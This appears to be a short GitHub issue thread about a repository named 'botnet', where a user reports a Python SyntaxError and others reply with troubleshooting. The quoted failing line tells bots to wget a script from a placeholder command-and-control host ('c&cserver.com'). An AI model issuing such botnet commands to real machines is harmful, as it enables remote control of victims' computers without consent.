botnet
botnet copied to clipboard
Doesn't work
command_bots("""wget -O /Users/Owner/Desktop/ "http://c&cserver.com/script.py"""") ^ SyntaxError: unterminated string literal (detected at line 52)
have you tried using python1-3?
have you tried using python1-3?
yes, both of them give me errors.
python3: SyntaxError: unterminated string literal (detected at line 52)
python2: SyntaxError: EOL while scanning string literal